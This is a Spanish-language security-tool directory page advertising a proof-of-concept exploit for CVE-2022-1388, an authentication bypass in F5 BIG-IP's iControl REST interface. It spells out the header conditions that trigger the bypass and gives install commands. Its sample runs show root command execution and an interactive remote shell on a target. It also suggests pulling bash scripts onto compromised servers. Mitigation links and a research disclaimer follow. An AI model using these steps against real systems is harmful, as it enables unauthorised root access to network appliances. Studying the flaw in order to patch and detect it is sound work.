Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-1388-POC — Una Prueba de Concepto Mejorada para CVE-2022-1388 con una Shell Interactiva | Kitploit
Herramientas/GitHubGitHub/psychosec2/cve-2022-1388-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubpsychosec2/cve-2022-1388-poc

CVE-2022-1388-POC

Una Prueba de Concepto Mejorada para CVE-2022-1388 con una Shell Interactiva

Ver Repositorio
144hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-1388 Poc por PsychoSec

POC mejorado para CVE-2022-1388 que afecta a múltiples productos F5.

Esta es una versión mejorada de la Prueba de Concepto de Horizon3 para CVE-2022-1388: https://github.com/horizon3ai/CVE-2022-1388

Esta versión contiene múltiples mejoras, así como un shell interactivo para ejecutar comandos remotos.

Análisis Técnico:

El análisis técnico de causa raíz de la vulnerabilidad realizado por Horizon3 se puede encontrar en su blog: https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/

Resumen:

Condiciones necesarias de una solicitud para explotar esta vulnerabilidad:

  1. El encabezado Connection debe incluir X-F5-Auth-Token
  2. El encabezado X-F5-Auth-Token debe estar presente
  3. El encabezado Host debe ser localhost / 127.0.0.1 o el encabezado Connection debe incluir X-Forwarded-Host
  4. El encabezado Auth debe configurarse con el nombre de usuario admin y cualquier contraseña

Requisitos:

  • git
  • pip3
  • python3

Instalación:

root@kitploit:~
git clone https://github.com/PsychoSec2/CVE-2022-1388-POC.git
cd ./CVE-2022-1388-POC
pip3 install -r requirements.txt
python3 ./CVE-2022-1388.py -h

Uso:

Probando un Objetivo:

root@kitploit:~
root@kali:/home/dev/CVE-2022-1388-POC# python3 CVE-2022-1388.py -u https://192.168.0.221 -t
Running test on target: https://192.168.0.221 | Command: whoami
Response: root
Target is vulnerable!!

Use -s option to run an interactive shell.

Shell Interactivo:

root@kitploit:~
root@kali:/home/dev/CVE-2022-1388-POC# python3 CVE-2022-1388.py -u https://192.168.0.221 -s
Running interactive shell..

root@f5-localhost: /var/service/restjavad$ 

No requiere el uso de ninguna conexión TCP inversa ni listeners.

Opciones:

root@kitploit:~
root@kali:/home/dev/CVE-2022-1388-POC# python3 CVE-2022-1388.py -h
Usage: CVE-2022-1388.py [options]

Options:
  -h, --help         Show this help message.
  -u URL, --url=URL  The IP address of the target.
  -t, --test         Test target for CVE-2022-1388.
  -s, --shell        Run an interactive shell.

Importante:

Tenga en cuenta que al ejecutar el shell interactivo en un sistema sin parchear, ciertos comandos y sintaxis podrían no funcionar o darle un resultado inesperado. Esto probablemente se deba al uso de JSON en las solicitudes y respuestas de la API del servidor. Para evitar problemas, trate de no usar caracteres individuales que sean comunes en la sintaxis JSON, como dos puntos, comas, llaves, corchetes, y especialmente comillas, cuando use el shell interactivo. Cualquier sintaxis JSON dentro de un comando debe estructurarse en formato.

El uso de cualquier tipo de sintaxis JSON no estructurada dentro de un comando podría llevar a una solicitud API malformada al servidor y podría dejarlo con: ninguna salida de comando, nada ejecutándose, o podría sacarlo del script de Python por completo. Esto, lamentablemente, inutiliza algunos comandos. Para solucionar este problema, puede escribir un script bash, descargarlo al servidor y ejecutarlo usando el shell interactivo. Tampoco es posible cambiar de directorio usando el comando 'cd'.

  • Introducción a JSON: https://javaee.github.io/tutorial/jsonp001.html

En cualquier caso, aún debería poder obtener una salida básica de comandos. Si no obtiene salida de comando, no significa que el comando no se haya ejecutado. Sin embargo, tendría que determinarlo usando su propio análisis.

Mitigaciones:

Actualice a la última versión o mitigue siguiendo las instrucciones del Aviso de Seguridad de F5

  • https://support.f5.com/csp/article/K23605346

Descargo de responsabilidad:

Este software ha sido creado puramente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado para atacar sistemas excepto donde se autorice explícitamente. Los mantenedores del proyecto no son responsables ni se les puede considerar responsables del mal uso del software. Úselo con responsabilidad.

Descargar herramienta